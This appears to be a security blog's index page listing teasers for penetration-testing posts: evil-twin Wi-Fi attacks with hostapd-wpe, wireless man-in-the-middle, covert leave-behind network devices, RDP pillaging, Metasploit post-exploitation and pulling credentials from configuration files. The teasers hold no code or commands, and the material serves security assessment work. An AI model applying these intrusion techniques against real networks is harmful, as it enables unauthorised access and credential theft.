TL;DR: Installing hostapd-wpe on a wireless router powered by an external power bank provides a standalone wireless attack platform with good transmit power, concealability, and mobility. Despite being almost 5 years old (but recently updated to support hostapd 2.6), hostapd-wpe is still a go-to tool for assessing the security of wireless clients attached to WPA2 Enterprise ... READ MORE
Evil AP Attacks with Spoofed Certificates
We've written in the past about the "Evil twin" or "Evil AP" attack using hostapd-wpe ("wireless pwnage edition"). This remains a viable attack in environments using enterprise authentication, and the patched hostapd obviates the need for a wireless access point, making the attack easy and portable. However, like most attacks there are still opportunities for tweaking and ... READ MORE
CTF Example – Web Application Security
During RSM's 2016 Capture the Flag (CTF) event, the Web Application Security category took the format of a full-blown web application penetration test. Participants could accomplish the 100 point challenge simply by exploring and mapping out the web application. By the time participants reached the 500 point level, they had performed password guessing, SQL injection, bypassed ... READ MORE
Approaches for Wireless Man-in-the-Middle
The wireless medium is inherently susceptible to man-in-the middle attacks. Whether the objective of such an attack is to capture traffic, or simply make an "evil" access point more believable by connecting clients to the Internet, there are a few different approaches one can take to inserting themselves between their target(s) and the Internet. This post explores two of ... READ MORE
Create an Encrypted Leave-Behind Device
Consider this scenario: You've breached the physical perimeter of the target organization. Once inside, you need to establish some means of remote network access, whether for yourself or your teammates waiting on the outside. In this example, this takes the form of a device you plug in to an unattended network jack within the target organization. Whether you call this ... READ MORE
Scripting RDP for Pillaging and Potato
Previous posts on the WarRoom have addressed expediting the use of remote desktop to facilitate pillaging. This post explores scripting commands through an RDP client to serve that same purpose. The end result is one-liner that will log in to a remote system, attach a local directory, execute a script, and save the output to that same local directory, provided the attacker has ... READ MORE
Ghosts in the Machines
Methods for the prevention, detection, and removal of ghosts in digital networks We often find that clients are so focused on preventing attacks from malicious living humans that they completely neglect the threat posed by ghosts. With that in mind, today’s post focuses on defensive measures that can be implemented to (1) prevent ghost infestations; (2) detect paranormal ... READ MORE
Launch rdesktop from Metasploit
I often resort to remote desktop sessions when pillaging or attempting lateral escalation. Remote desktop provides an easy way to look for important data, get an idea of what applications are in use, run scripts or programs, and transfer data between my host and the target system. Since the Windows “Remote Desktop Connection” program keeps track of IP addresses and makes it ... READ MORE
Metasploit Module of the Month – enum_ad_computers
Summer has officially ended and Autumn is setting in. As the leaves begin to fall and September draws to a close, it’s a perfect time to sit back and reflect on the metasploit modules that filled our Summer months with joy. In the third installment of our “Module of the Month” series we examine enum_ad_computers, a post-exploitation module that combines the flexibility of LDAP ... READ MORE
Retrieving Credentials from Configuration Files
“Security is not convenient.” Though blunt, this phrase neatly captures the fundamental conflict between typical users and information security personnel. Typical users want their workstations and networks to be configured for speed, accessibility, and convenience, whereas security professionals prioritize tight access control and monitoring. If you believe that security is ... READ MORE